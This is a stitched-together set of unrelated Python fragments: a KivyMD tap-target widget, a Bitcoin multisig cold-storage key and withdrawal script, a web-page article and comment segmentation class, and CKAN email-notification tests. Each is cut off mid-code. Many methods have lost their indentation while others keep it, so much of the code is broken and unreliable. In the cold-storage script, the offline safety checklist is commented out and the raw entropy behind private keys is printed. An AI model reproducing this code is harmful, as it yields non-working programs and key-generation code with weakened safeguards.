`'left`', `'right`', `'top`', `'bottom`', `'left_top`', `'right_top`',
`'left_bottom`', `'right_bottom`', `'center`'.
:attr:`widget_position` is an :class:`~kivy.properties.OptionProperty`
and defaults to `'left'`.
"""
title_position = OptionProperty(
"auto",
options=[
"auto",
"left",
"right",
"top",
"bottom",
"left_top",
"right_top",
"left_bottom",
"right_bottom",
],
)
"""
Sets the position of :attr`~title_text` on the outer circle. Only works if
:attr`~widget_position` is set to `'center'`. In all other cases, it
calculates the :attr`~title_position` itself.
Must be set to other than `'auto`' when :attr`~widget_position` is set
to `'center`'.
Available options are `'auto'`, `'left`', `'right`', `'top`', `'bottom`',
`'left_top`', `'right_top`', `'left_bottom`', `'right_bottom`', `'center`'.
:attr:`title_position` is an :class:`~kivy.properties.OptionProperty`
and defaults to `'auto'`.
"""
stop_on_outer_touch = BooleanProperty(False)
"""
Whether clicking on outer circle stops the animation.
:attr:`stop_on_outer_touch` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `False`.
"""
stop_on_target_touch = BooleanProperty(True)
"""
Whether clicking on target circle should stop the animation.
:attr:`stop_on_target_touch` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `True`.
"""
state = OptionProperty("close", options=["close", "open"])
"""
State of :class:`~MDTapTargetView`.
:attr:`state` is an :class:`~kivy.properties.OptionProperty`
and defaults to `'close'`.
"""
_outer_radius = NumericProperty(0)
_target_radius = NumericProperty(0)
    def __init__(self, **kwargs):
        """Build the text labels and internal state, then apply Kivy properties.

        Event registration happens after ``super().__init__`` so that
        ``bind(on_open=...)`` works immediately on a fresh instance.
        """
        # Maximum distance the target ripple travels (used by the ripple animation).
        self.ripple_max_dist = dp(90)
        # Run the radius property handlers once with the current defaults so
        # dependent state is initialised even if the properties never change.
        # (Handlers are defined further down the class — defined outside this
        # chunk; presumably they derive _outer_radius/_target_radius.)
        self.on_outer_radius(self, self.outer_radius)
        self.on_target_radius(self, self.target_radius)
        self.anim_ripple = None
        # Core labels whose textures are blitted onto the canvas in _draw_canvas.
        self.core_title_text = Label(
            markup=True, size_hint=(None, None), bold=self.title_text_bold
        )
        # Keep the label's size in sync with its rendered texture.
        self.core_title_text.bind(
            texture_size=self.core_title_text.setter("size")
        )
        self.core_description_text = Label(markup=True, size_hint=(None, None))
        self.core_description_text.bind(
            texture_size=self.core_description_text.setter("size")
        )
        super().__init__(**kwargs)
        self.register_event_type("on_outer_touch")
        self.register_event_type("on_target_touch")
        self.register_event_type("on_outside_click")
        self.register_event_type("on_open")
        self.register_event_type("on_close")
        # Default the outer circle colour to the theme's primary colour
        # (rgb only — the alpha channel is provided by outer_circle_alpha).
        if not self.outer_circle_color:
            self.outer_circle_color = self.theme_cls.primary_color[:-1]
def _initialize(self):
setattr(self.widget, "_outer_radius", 0)
setattr(self.widget, "_target_radius", 0)
setattr(self.widget, "target_ripple_radius", 0)
setattr(self.widget, "target_ripple_alpha", 0)
# Bind some function on widget event when this function is called
# instead of when the class itself is initialized to prevent all
# widgets of all instances to get bind at once and start messing up.
self.widget.bind(on_touch_down=self._some_func)
    def _draw_canvas(self):
        """Draw the whole tap-target scene on ``widget.canvas.before``.

        All instructions are tagged with group ``"ttv_group"`` so they can be
        removed together in ``_after_stop`` via ``remove_group``.
        _pos comes from ``_ttv_pos`` (defined outside this chunk); from usage
        here, _pos[0] is the outer-circle position and _pos[1] the title-text
        position — TODO confirm against _ttv_pos.
        """
        _pos = self._ttv_pos()
        self.widget.canvas.before.clear()
        with self.widget.canvas.before:
            # Outer circle.
            Color(
                *self.outer_circle_color,
                self.outer_circle_alpha,
                group="ttv_group",
            )
            _rad1 = self.widget._outer_radius
            Ellipse(size=(_rad1, _rad1), pos=_pos[0], group="ttv_group")
            # Title text.
            Color(*self.title_text_color, group="ttv_group")
            Rectangle(
                size=self.core_title_text.texture.size,
                texture=self.core_title_text.texture,
                pos=_pos[1],
                group="ttv_group",
            )
            # Description text: placed directly below the title (5px gap).
            Color(*self.description_text_color, group="ttv_group")
            Rectangle(
                size=self.core_description_text.texture.size,
                texture=self.core_description_text.texture,
                pos=(
                    _pos[1][0],
                    _pos[1][1] - self.core_description_text.size[1] - 5,
                ),
                group="ttv_group",
            )
            # Target circle, centred on the widget.
            Color(*self.target_circle_color, group="ttv_group")
            _rad2 = self.widget._target_radius
            Ellipse(
                size=(_rad2, _rad2),
                pos=(
                    self.widget.x - (_rad2 / 2 - self.widget.size[0] / 2),
                    self.widget.y - (_rad2 / 2 - self.widget.size[0] / 2),
                ),
                group="ttv_group",
            )
            # Target ripple, same centre as the target circle.
            Color(
                *self.target_circle_color,
                self.widget.target_ripple_alpha,
                group="ttv_group",
            )
            _rad3 = self.widget.target_ripple_radius
            Ellipse(
                size=(_rad3, _rad3),
                pos=(
                    self.widget.x - (_rad3 / 2 - self.widget.size[0] / 2),
                    self.widget.y - (_rad3 / 2 - self.widget.size[0] / 2),
                ),
                group="ttv_group",
            )
def stop(self, *args):
"""Starts widget close animation."""
# It needs a better implementation.
if self.anim_ripple is not None:
self.anim_ripple.unbind(on_complete=self._repeat_ripple)
self.core_title_text.opacity = 0
self.core_description_text.opacity = 0
anim = Animation(
d=0.15,
t="in_cubic",
**dict(
zip(
["_outer_radius", "_target_radius", "target_ripple_radius"],
[0, 0, 0],
)
),
)
anim.bind(on_complete=self._after_stop)
anim.start(self.widget)
def _after_stop(self, *args):
self.widget.canvas.before.remove_group("ttv_group")
args[0].stop_all(self.widget)
elev = getattr(self.widget, "elevation", None)
if elev:
self._fix_elev()
self.dispatch("on_close")
# Don't forget to unbind the function or it'll mess
# up with other next bindings.
self.widget.unbind(on_touch_down=self._some_func)
self.state = "close"
def _fix_elev(self):
with self.widget.canvas.before:
Color(a=self.widget._soft_shadow_a)
Rectangle(
texture=self.widget._soft_shadow_texture,
size=self.widget._soft_shadow_size,
pos=self.widget._soft_shadow_pos,
| |
no address decoded
continue
out_addresses = output["scriptPubKey"]["addresses"]
amount_btc = output["value"]
if address in out_addresses:
utxos.append(output)
return utxos
def create_unsigned_transaction(source_address, destinations, redeem_script, input_txs):
    """
    Returns a hex string representing an unsigned bitcoin transaction
    returns => <string>

    source_address: <string> input_txs will be filtered for utxos to this source address
    destinations: {address <string>: amount<string>} dictionary mapping destination addresses to amount in BTC
    redeem_script: <string>
    input_txs: List<dict> List of input transactions in dictionary form (bitcoind decoded format)
    """
    ensure_bitcoind_running()
    # Drop any destination address that would receive 0 BTC.
    destinations = OrderedDict(
        (addr, amount) for addr, amount in destinations.items() if amount != '0')
    # createrawtransaction needs the txid and vout index of every UTXO spent.
    inputs = [
        OrderedDict([("txid", tx["txid"]), ("vout", int(utxo["n"]))])
        for tx in input_txs
        for utxo in get_utxos(tx, source_address)
    ]
    tx_unsigned_hex = bitcoin_cli_checkoutput(
        "createrawtransaction",
        json.dumps(inputs),
        json.dumps(destinations)).strip()
    return tx_unsigned_hex
def sign_transaction(source_address, keys, redeem_script, unsigned_hex, input_txs):
    """
    Creates a signed transaction
    output => dictionary {"hex": transaction <string>, "complete": <boolean>}

    source_address: <string> input_txs will be filtered for utxos to this source address
    keys: List<string> The private keys you wish to sign with
    redeem_script: <string>
    unsigned_hex: <string> The unsigned transaction, in hex format
    input_txs: List<dict> A list of input transactions to use (bitcoind decoded format)
    """
    # signrawtransactionwithkey needs txid, vout, amount, scriptPubKey and
    # redeemScript for every UTXO being signed.
    inputs = [
        {
            "txid": tx["txid"],
            "vout": int(utxo["n"]),
            "amount": utxo["value"],
            "scriptPubKey": utxo["scriptPubKey"]["hex"],
            "redeemScript": redeem_script,
        }
        for tx in input_txs
        for utxo in get_utxos(tx, source_address)
    ]
    return bitcoin_cli_json(
        "signrawtransactionwithkey",
        unsigned_hex, json.dumps(keys), json.dumps(inputs))
def get_fee_interactive(source_address, keys, destinations, redeem_script, input_txs):
    """
    Returns a recommended transaction fee, given market fee data provided by the user interactively
    Because fees tend to be a function of transaction size, we build the transaction in order to
    recommend a fee.

    return => <Decimal> fee value

    Parameters:
      source_address: <string> input_txs will be filtered for utxos to this source address
      keys: A list of signing keys
      destinations: {address <string>: amount<string>} dictionary mapping destination addresses to amount in BTC
      redeem_script: String
      input_txs: List<dict> List of input transactions in dictionary form (bitcoind decoded format)
    """
    MAX_FEE = .005  # in btc. hardcoded limit to protect against user typos
    ensure_bitcoind_running()
    approve = False
    while not approve:
        print("\nEnter fee rate.")
        fee_basis_satoshis_per_byte = int(input("Satoshis per vbyte: "))
        # Build and sign a throwaway copy of the transaction purely to
        # measure its size; the real transaction is built later by the caller.
        unsigned_tx = create_unsigned_transaction(
            source_address, destinations, redeem_script, input_txs)
        signed_tx = sign_transaction(source_address, keys,
                                     redeem_script, unsigned_tx, input_txs)
        decoded_tx = bitcoin_cli_json("decoderawtransaction", signed_tx["hex"])
        size = decoded_tx["vsize"]  # virtual size as reported by bitcoind
        fee = size * fee_basis_satoshis_per_byte
        fee = satoshi_to_btc(fee)
        if fee > MAX_FEE:
            print("Calculated fee ({}) is too high. Must be under {}".format(fee, MAX_FEE))
        else:
            print("\nBased on the provided rate, the fee will be {} bitcoin.".format(fee))
            confirm = yes_no_interactive()
            if confirm:
                approve = True
            else:
                print("\nFee calculation aborted. Starting over...")
    return fee
################################################################################################
#
# QR code helper functions
#
################################################################################################
def write_and_verify_qr_code(name, filename, data):
    """
    Write a QR code and then read it back to try and detect any tricksy malware tampering with it.

    name: <string> short description of the data
    filename: <string> filename for storing the QR code
    data: <string> the data to be encoded

    Raises subprocess.CalledProcessError if qrencode or zbarimg fails.
    """
    # SECURITY FIX: the previous implementation interpolated `data` into a
    # shell command string (shell=True). An address/script containing shell
    # metacharacters would be mangled or, worse, executed. Pass argument
    # lists with the default shell=False instead.
    subprocess.check_call(["qrencode", "-o", filename, data])
    check = subprocess.check_output(
        ["zbarimg", "--set", "*.enable=0", "--set", "qr.enable=1",
         "--quiet", "--raw", filename])
    if check.decode('ascii').strip() != data:
        print("********************************************************************")
        print("WARNING: {} QR code could not be verified properly. This could be a sign of a security breach.".format(name))
        print("********************************************************************")
    print("QR code for {0} written to {1}".format(name, filename))
################################################################################################
#
# User sanity checking
#
################################################################################################
def yes_no_interactive():
    """
    Prompt the user for confirmation until they answer clearly.

    returns => <boolean> True for "y"/"Y", False for "n"/"N"
    """
    answer = input("Confirm? (y/n): ")
    while True:
        normalized = answer.upper()
        if normalized == "Y":
            return True
        if normalized == "N":
            return False
        print("You must enter y (for yes) or n (for no).")
        answer = input("Confirm? (y/n): ")
def safety_checklist():
    """
    Walk the user through the operational-security checklist.

    Exits the program if any precaution is not confirmed with "y".
    """
    checks = [
        "Are you running this on a computer WITHOUT a network connection of any kind?",
        "Have the wireless cards in this computer been physically removed?",
        "Are you running on battery power?",
        "Are you running on an operating system booted from a USB drive?",
        "Is your screen hidden from view of windows, cameras, and other people?",
        "Are smartphones and all other nearby devices turned off and in a Faraday bag?"]
    for question in checks:
        response = input(question + " (y/n)?")
        if response.upper() != "Y":
            print("\n Safety check failed. Exiting.")
            sys.exit()
################################################################################################
#
# Main "entropy" function
#
################################################################################################
def unchunk(string):
    """
    Remove spaces in string
    """
    return "".join(string.split(" "))
def chunk_string(string, length):
    """
    Splits a string into chunks of [length] characters, for easy human readability

    Yields successive slices; the final chunk may be shorter than [length].
    Source: https://stackoverflow.com/a/18854817/11031317
    """
    for start in range(0, len(string), length):
        yield string[start:start + length]
def entropy(n, length):
    """
    Generate n random strings for the user from /dev/random

    n: <int> number of entropy strings to generate
    length: <int> number of random bytes per string (xxd -l)
    returns => List<string> hex strings with internal spacing removed
    """
    #safety_checklist()
    print("\n\n")
    print("Making {} random data strings....".format(n))
    print("If strings don't appear right away, please continually move your mouse cursor. These movements generate entropy which is used to create random data.\n")
    entropies = []
    # Idiom fix: a for-over-range replaces the manual while/counter loop, and
    # the command is passed as an argument list (shell=False) instead of a
    # shell-interpolated string.
    for idx in range(1, n + 1):
        seed = subprocess.check_output(
            ["xxd", "-l", str(length), "-p", "/dev/random"])
        seed = seed.decode('ascii').replace('\n', '')
        print("Computer entropy #{0}: {1}".format(idx, " ".join(chunk_string(seed, 4))))
        entropies.append("".join(chunk_string(seed, 4)))
    return entropies
################################################################################################
#
# Main "deposit" function
#
################################################################################################
def deposit_interactive(m, n, dice_seed_length=62, rng_seed_length=20):
    """
    Generate data for a new cold storage address (private keys, address, redemption script)

    m: <int> number of multisig keys required for withdrawal
    n: <int> total number of multisig keys
    dice_seed_length: <int> minimum number of dice rolls required
    rng_seed_length: <int> minimum length of random seed required
    """
    #safety_checklist()
    ensure_bitcoind_running()
    require_minimum_bitcoind_version(170000)  # getaddressesbylabel API new in v0.17.0
    print("\n")
    print("Creating {0}-of-{1} cold storage address.\n".format(m, n))
    keys = []
    # BUG FIX: the RNG seed length was hardcoded to 20, silently ignoring the
    # rng_seed_length parameter; pass the parameter through (default is still
    # 20, so default behavior is unchanged).
    entropies = entropy(n, rng_seed_length)
    while len(keys) < n:
        index = len(keys) + 1
        print("\n==========================================")
        print("Creating private key #{}".format(index))
        dice_seed_string = read_dice_seed_interactive(dice_seed_length)
        dice_seed_hash = hash_sha256(dice_seed_string)
        #rng_seed_string = read_rng_seed_interactive(rng_seed_length)
        rng_seed_string = entropies[index - 1]
        print("USED ENTROPY", index - 1, "WHICH IS: ", entropies[index - 1])
        rng_seed_hash = hash_sha256(rng_seed_string)
        # XOR the two independent entropy sources; result is a hex string again.
        hex_private_key = xor_hex_strings(dice_seed_hash, rng_seed_hash)
        WIF_private_key = hex_private_key_to_WIF_private_key(hex_private_key)
        keys.append(WIF_private_key)
    print("Private keys created.")
    print("Generating {0}-of-{1} cold storage address...\n".format(m, n))
    addresses = [get_address_for_wif_privkey(key) for key in keys]
    results = addmultisigaddress(m, addresses)
    print("Private keys:")
    for idx, key in enumerate(keys):
        print("Key #{0}: {1}".format(idx + 1, key))
    print("\nCold storage address:")
    print("{}".format(results["address"]))
    print("\nRedemption script:")
    print("{}".format(results["redeemScript"]))
    print("")
    write_and_verify_qr_code("cold storage address", "address.png", results["address"])
    write_and_verify_qr_code("redemption script", "redemption.png", results["redeemScript"])
################################################################################################
#
# Main "withdraw" function
#
################################################################################################
def withdraw_interactive():
"""
Construct and sign a transaction to withdaw funds from cold storage
All data required for transaction construction is input at the terminal
"""
#safety_checklist()
ensure_bitcoind_running()
require_minimum_bitcoind_version(170000) # signrawtransaction API changed in v0.17.0
approve = False
while not approve:
addresses = OrderedDict()
print("\nYou will need to enter several pieces of information to create a withdrawal transaction.")
print("\n\n*** PLEASE BE SURE TO ENTER THE CORRECT DESTINATION ADDRESS ***\n")
source_address = input("\nSource cold storage address: ")
addresses[source_address] = 0
redeem_script = input("\nRedemption script for source cold storage address: ")
dest_address = input("\nDestination address: ")
addresses[dest_address] = 0
num_tx = int(input("\nHow many unspent transactions will you be using for this withdrawal? "))
txs = []
utxos = []
utxo_sum = Decimal(0).quantize(SATOSHI_PLACES)
while len(txs) < num_tx:
print("\nPlease paste raw transaction #{} (hexadecimal format) with unspent outputs at the source address".format(len(txs) + 1))
print("OR")
print("input a filename located in the current directory which contains the raw transaction data")
print("(If the transaction data is over ~4000 characters long, you _must_ use a file.):")
hex_tx = input()
if os.path.isfile(hex_tx):
hex_tx = open(hex_tx).read().strip()
tx = bitcoin_cli_json("decoderawtransaction", hex_tx)
txs.append(tx)
utxos += get_utxos(tx, source_address)
if len(utxos) == 0:
print("\nTransaction data not found for source address: {}".format(source_address))
sys.exit()
else:
print("\nTransaction data found for source address.")
for utxo in utxos:
value = Decimal(utxo["value"]).quantize(SATOSHI_PLACES)
utxo_sum += value
print("TOTAL unspent amount for this raw transaction: {} BTC".format(utxo_sum))
print("\nHow many private keys will you be signing this transaction with? ")
key_count = int(input("#: "))
keys = []
while len(keys) < key_count:
key = input("Key #{0}: ".format(len(keys) + 1))
keys.append(key)
###### fees, amount, and change #######
input_amount = utxo_sum
fee = get_fee_interactive(
source_address, keys, addresses, redeem_script, txs)
if fee > input_amount:
print("ERROR: Your fee is greater | |
# Repository: Del2909/Online-concencus-app
####################################################################
# Licence: Creative Commons (see COPYRIGHT) #
# Authors: <NAME>, <NAME> #
# {nik0spapp, <EMAIL> #
# Supervisor: <NAME> #
# <EMAIL> #
# University of the Aegean #
# Department of Information and Communication Systems Engineering #
# Information Management Track (MSc) #
# Karlovasi, Samos #
# Greece #
####################################################################
import sys
import re
import requests
import copy
import nltk
from region import Region
from lxml import etree, html
from lxml.html import HtmlComment
from lxml.html.clean import Cleaner
from terminal_colors import Tcolors
# Tags whose content may form a candidate text region.
VALID_TAGS = ['div','td','span','p','form','dd','dt','li']
# Subset of VALID_TAGS treated as strong structural containers.
STRONG_TAGS = ['div','td','dd','dt','li']
# Labels for the page models the classifier can produce.
MODEL_TAGS = ["article", "comments", "multiple_regions"]
# Tags stripped from the DOM before segmentation (via Cleaner remove_tags).
TAGS = ['a','img','strong','b','i','br','script','style',
        'h4','h5','h6','strong', 'noscript','em','center']
# Keyword arguments for lxml.html.clean.Cleaner.
ARGS = {'meta':False, 'safe_attrs_only':False, 'page_structure':False,
        'scripts':True, 'style':True, 'links':True, 'remove_tags':TAGS}
T1 = 50 # max density region distance threshold
T2 = 20 # min region density threshold
class SDAlgorithm():
    def __init__(self):
        # Nodes considered useful for segmentation — populated while
        # crossing the DOM tree (cross_tree, defined outside this chunk).
        self.valid_nodes = {}
        # Detected Region objects for the current page.
        self.regions = []
        # Densest region and its density (set during region creation).
        self.max_region = None
        self.max_region_density = None
        # Smallest region depth seen so far and how often it was improved.
        self.min_region_level = 10000
        self.min_region_level_counter = 0
        # One of MODEL_TAGS once the page has been classified.
        self.page_model = None
        # URL of the page to analyze; must be set before analyze_page().
        self.url = None
        # Full text of the detected main article, if any.
        self.totalarticle = ""
def analyze_page(self):
print("[*] Create DOM tree...")
tree = self.construct_page_tree()
node = tree.getroot()
self.cross_tree(node)
print("[*] Calculating initial groups...")
print("[*] Merging groups...")
self.merge_groups(tree)
print("[*] Creating regions...")
self.create_regions(tree)
print("[*] Calculating distances from max region...")
self.calculate_distances_from_max(tree)
print("[*] Printing regions...\n")
for region in self.regions:
region._print()
article, comments, multiple = self.classify_page()
if article is not None and comments is None:
self.totalarticle = article.full_text
return 'article', article, None, None
elif article is not None:
self.totalarticle = article.full_text
return 'comment', article, comments
else:
return 'multiple', None, None, multiple
def construct_page_tree(self):
"""
Downloads the HTML page given the URL and creates the DOM page tree.
Only the nodes that are useful for the segmentation are kept.
"""
#Gotta fix the input variable
page = requests.get(self.url)
html_body = page.text
doc = html.fromstring(html_body)
cleaner = Cleaner(**ARGS)
try:
doc = cleaner.clean_html(doc)
except:
pass
tree = doc.getroottree()
return tree
    def classify_page(self):
        """
        Characterize the page according to i) has main article (has_article()),
        ii) has main article with comments (is_full_article()), iii) has multiple
        opinions like a forum (is_discussion()).

        returns => 3-tuple (article, comments, multiple_regions); the slots
        that do not apply are None.
        """
        validated = False
        [biggest_regions, grouped_comments]= self.group_regions()
        [article_exists, article] = self.has_article(biggest_regions)
        if article_exists:
            # Densest comment-like group that shares a parent level with the article.
            max_group = self.get_candidate_article(article, grouped_comments)
            if max_group in grouped_comments:
                if grouped_comments != {}:
                    validated = self.candidate_group_level_validated(max_group, article, grouped_comments)
                context_validated = self.candidate_context_validated(article, grouped_comments, max_group)
                if self.big_areas_in_same_level(article, grouped_comments, max_group) and not validated:
                    # Article and "comments" sit on the same tree level and the
                    # group failed validation: treat the page as forum-like.
                    print(Tcolors.INFO + " Multiple similar regions detected!")
                    print("Class: ")
                    print(Tcolors.RES + " " + grouped_comments[max_group][0].class_name)
                    print("Texts: ")
                    for reg in grouped_comments[max_group]:
                        print(reg.full_text)
                    return None, None, grouped_comments[max_group]
                elif not context_validated:
                    # Article found but no trustworthy comment regions.
                    print()
                    self.print_article(article)
                    print()
                    print(Tcolors.INFO + " No comments found.")
                    return article, None, None
                elif context_validated:
                    # Article plus a validated comment group.
                    print()
                    print(Tcolors.INFO + " Article with comments detected!")
                    self.print_article(article)
                    print()
                    print("Comment class:")
                    print(Tcolors.RES + " " + max_group)
                    print("Comments:")
                    for com in grouped_comments[max_group]:
                        print(com.full_text)
                    return article, grouped_comments[max_group], None
            else:
                # No candidate comment group at all: article only.
                self.print_article(article)
                return article, None, None
        else:
            # No single dominant article: report the big regions as multiple.
            print(Tcolors.INFO + " Multiple similar regions detected!")
            print(Tcolors.RES)
            print("Texts: ")
            for reg in biggest_regions:
                print(reg.full_text)
            return None, None, biggest_regions
    def group_regions(self):
        """
        Compute and return two groups of regions, namely the one for those that have
        distance smaller or equal to the max density region distance threshold (T1)
        and the second the regions that can be grouped based on their CSS classes.

        returns => (biggest_regions <list>, grouped_comments <dict class_name -> list>)
        """
        biggest_regions = []
        grouped_comments = {}
        for region in self.regions:
            # Regions whose density is within T1 of the maximum.
            if region.distance_from_max <= T1:
                biggest_regions.append(region)
            # Track the shallowest titled region depth seen so far.
            if region.distance_from_root < self.min_region_level \
               and self.combined_region_level_exceeded(region):
                self.min_region_level_counter += 1
                self.min_region_level = region.distance_from_root
            # True when the region's parent element carries a class attribute
            # that mentions "comment" (used for class-less regions).
            pr_com = (len(region.tree.xpath(region.root)) > 0 and\
                'class' in region.tree.xpath(region.root)[0].getparent().attrib and \
                region.tree.xpath(region.root)[0].getparent().attrib["class"].count('comment') > 0)
            # Group non-maximal regions by CSS class name; class-less regions
            # are admitted only if their parent looks comment-related.
            if region.distance_from_max != 0 and (region.class_name != "" or \
                (region.class_name == "" and pr_com)):
                if region.class_name not in grouped_comments:
                    grouped_comments[region.class_name] = [region]
                else:
                    grouped_comments[region.class_name].append(region)
        return biggest_regions, grouped_comments
def combined_region_level_exceeded(self, region):
"""
Check whether the candidate article region is close to the root
and has an HTML title in some of its nearest ancestors.
"""
level = region.distance_from_root
title_level = region.ancestor_title_level
return level - title_level > level / 2
def has_article(self, biggest_regions):
"""
Check whether the candidate regions have a potential article and
return the possible candidate.
"""
article_region = None
if len(biggest_regions)==1:
return True, biggest_regions[0]
elif biggest_regions is None:
return False, None
biggest_regions = [reg for reg in biggest_regions if reg.ancestor_title\
is not None and reg.distance_from_root <= self.min_region_level\
and self.combined_region_level_exceeded(reg)]
if self.min_region_level_counter > 1 or biggest_regions == []:
pass
else:
article_region = self.find_article_region(biggest_regions)
if article_region:
return True, article_region
return False, article_region
def find_article_region(self, biggest_regions):
"""
Return the region that has the minimum title level among the
biggest regions.
"""
region_min_title_level = None
min_title_level = 1000
for reg in biggest_regions:
if reg.ancestor_title_level < min_title_level:
min_title_level = reg.ancestor_title_level
region_min_title_level = reg
article = region_min_title_level
return article
def get_candidate_article(self, article, grouped_comments):
"""
Check whether the candidate article region is on the same level with the
candidate group of comments and return the maximum density group that
the candidate article belongs to.
"""
min_dist = 1000
max_path_level = 0
min_dist_group = None
max_group_density = 0
if article.root_node.getparent() is not None:
article_parent_path = self.get_path(article.root_node.getparent())
else:
article_parent_path = ""
max_group = None
groups_level = {}
groups_below_article_tags = []
if grouped_comments is not None:
groups_tuple = list(grouped_comments.items())
for group in groups_tuple:
if group[1][0].root != article.root:
comment_parent_path = self.get_path(group[1][0].root_node.getparent())
common_path = self.extract_common(article_parent_path,comment_parent_path)
common_path_level = common_path.count("/")
comment_path_level = comment_parent_path.count("/")
article_level = article_parent_path.count("/")
groups_level[group[0]] = common_path_level
equal = comment_path_level == article_level
if common_path_level > max_path_level and common_path_level <= article_level :
max_path_level = common_path_level
groups_below_article_tags = [group[0] for group in list(groups_level.items()) if \
group[1]==max_path_level]
for group in groups_below_article_tags:
group_density = self.find_group_density(grouped_comments[group])
if group_density > max_group_density:
max_group_density = group_density
max_group = group
return max_group
def extract_common(self, a, b):
"""
Extract common path between two node paths.
"""
m = min(len(a), len(b))
for i in range(m):
if a[i] != b[i]:
return self.common_path(a[:i])
return self.common_path(a[:m])
def common_path(self, a):
"""
Parse the string of the path of a given node and find the
closest valid position for a legitimate path.
"""
if (len(a) - 1) >= 0 and (a.endswith("[") or a[len(a)-1].isdigit()):
a_arr = a.split("/")
a_final = a_arr[:len(a_arr) - 1]
a = "/".join(a_final)
elif a.endswith("/"):
a = a[:len(a) - 1]
return a
def find_group_density(self, groups):
"""
Find the group with the maximum density with respect to the number
of characters that are included in their content.
"""
total_density = 0
for region in groups:
for content in region.contents:
content_text = region.root_node.xpath(content)[0].text_content()
if content_text is not None:
total_density += len(re.sub(r" |\n|\r|\t","",content_text))
return total_density
def candidate_group_level_validated(self, max_group, article, grouped_comments):
    """
    Validate whether the maximum detected group qualifies for an article.

    Invalidates (and removes from `grouped_comments`) the candidate group
    when the comment region's first numeric index does not precede the
    article's under their common ancestor; otherwise walks the common
    ancestor's descendants to confirm the article appears before the first
    comment region. Finally requires the article to be at most 4 levels
    below the common ancestor.
    """
    validated = True
    article_path = article.root
    comment_path = grouped_comments[max_group][0].root
    common = self.extract_common(article_path, comment_path)
    article_path = article_path.replace(common, "")
    comment_path = comment_path.replace(common, "")
    article_remaining_nodes = article_path.split("/")
    comment_remaining_nodes = comment_path.split("/")
    if len(article_remaining_nodes) > 1 and len(comment_remaining_nodes) > 1:
        article_number = re.search(r"\d", article_remaining_nodes[0])
        comment_number = re.search(r"\d", comment_remaining_nodes[0])
        if article_number and comment_number:
            # BUG FIX: the original discarded the .start() results and then
            # compared the re.Match objects themselves, which raises
            # TypeError on Python 3.  Compare the digit positions instead
            # (presumably the intended comparison -- the dangling .start()
            # calls suggest it; confirm against upstream behavior).
            if article_number.start() >= comment_number.start():
                del grouped_comments[max_group]
                validated = False
    else:
        comment_not_found = True
        validated = False
        try:
            common_node = article.tree.xpath(common)
        except Exception:
            # Invalid or empty XPath -- treat as "no common node found".
            common_node = []
        if common_node != []:
            for child in common_node[0].iterdescendants():
                if self.get_path(child) == article.root and comment_not_found:
                    validated = True
                    break
                if self.get_path(child) == grouped_comments[max_group][0].root:
                    comment_not_found = False
    # The article must sit no more than 4 levels below the common ancestor.
    if not (validated and article.distance_from_root - common.count("/") <= 4):
        validated = False
    return validated
def big_areas_in_same_level(self, article, grouped_comments, max_group):
    """
    Check whether the big regions (or areas) sit at the same depth of the
    HTML tree; falls back to the combined-region level check alone when
    the candidate group is no longer present.
    """
    if max_group not in grouped_comments:
        return self.combined_region_level_exceeded(article)
    first_candidate_comment = grouped_comments[max_group][0]
    same_depth = article.distance_from_root == first_candidate_comment.distance_from_root
    return same_depth and self.combined_region_level_exceeded(article)
def candidate_context_validated(self, article, grouped_comments, max_group):
"""
Check whether the candidate comment regions validate as such based on
the keywords that are detected in their content.
"""
print(Tcolors.ACT + " Validating candidate | |
# encoding: utf-8
import time
import pytest
import ckan.model as model
import ckan.tests.legacy as tests
import ckan.tests.helpers as helpers
from ckan.tests.legacy import TestController as ControllerTestCase
class TestEmailNotifications(ControllerTestCase):
    """Functional tests for activity-stream email notifications.

    NOTE(review): several ``def test_NN_...`` headers below are commented
    out, so their bodies now run sequentially inside
    ``test_00_send_email_notifications_not_logged_in`` (they share the
    ``mail_server`` fixture and depend on each other's accumulated state).
    The original numbered docstrings are kept in place to mark each stage.
    """

    @classmethod
    def setup_class(cls):
        # Start from a clean database with the standard test fixtures, and
        # cache the ids/apikeys of the users the tests act as.
        model.repo.rebuild_db()
        tests.CreateTestData.create()
        cls.app = helpers._get_test_app()
        joeadmin = model.User.get("joeadmin")
        cls.joeadmin = {"id": joeadmin.id, "apikey": joeadmin.apikey}
        testsysadmin = model.User.get("testsysadmin")
        cls.testsysadmin = {
            "id": testsysadmin.id,
            "apikey": testsysadmin.apikey,
        }
        annafan = model.User.get("annafan")
        cls.annafan = {"id": annafan.id, "apikey": annafan.apikey}
        # Register a new user.
        cls.sara = tests.call_action_api(
            cls.app,
            "user_create",
            apikey=cls.testsysadmin["apikey"],
            name="sara",
            email="<EMAIL>",
            password="<PASSWORD>",
            fullname="<NAME>",
            activity_streams_email_notifications=True,
        )

    def check_email(self, email, address, name, subject):
        # NOTE(review): `email` appears to be an SMTP message tuple where
        # [1] is the envelope sender, [2] the recipient list and [3] the raw
        # payload -- confirm against the mail_server fixture.
        assert email[1] == "<EMAIL>"
        assert email[2] == [address]
        encoded_subject = "Subject: =?utf-8?q?{subject}".format(
            subject=subject.replace(" ", "_")
        )
        assert encoded_subject in email[3]
        # TODO: Check that body contains link to dashboard and email prefs.

    def test_00_send_email_notifications_not_logged_in(self, mail_server):
        """Not-logged-in users shouldn't be able to send email notifications.
        """
        tests.call_action_api(self.app, "send_email_notifications", status=403)

        # def test_00_send_email_notifications_not_authorized(self):
        """Unauthorized users shouldn't be able to send email notifications.
        """
        tests.call_action_api(
            self.app,
            "send_email_notifications",
            apikey=self.annafan["apikey"],
            status=403,
        )

        # def test_01_no_email_notifications_after_registration(self):
        """A new user who isn't following anything shouldn't get any emails."""
        # Clear any emails already sent due to CreateTestData.create().
        tests.call_action_api(
            self.app,
            "send_email_notifications",
            apikey=self.testsysadmin["apikey"],
        )
        mail_server.clear_smtp_messages()
        # No notification emails should be sent to anyone at this point.
        tests.call_action_api(
            self.app,
            "send_email_notifications",
            apikey=self.testsysadmin["apikey"],
        )
        assert len(mail_server.get_smtp_messages()) == 0

        # def test_02_one_new_activity(self):
        """A user with one new activity should get one email."""
        # Make Sara follow something, have to do this to get new activity.
        tests.call_action_api(
            self.app,
            "follow_dataset",
            apikey=self.sara["apikey"],
            id="warandpeace",
        )
        # Make someone else update the dataset Sara's following, this should
        # create a new activity on Sara's dashboard.
        tests.call_action_api(
            self.app,
            "package_update",
            apikey=self.joeadmin["apikey"],
            name="warandpeace",
            notes="updated",
        )
        # Run the email notifier job, it should send one notification email
        # to Sara.
        tests.call_action_api(
            self.app,
            "send_email_notifications",
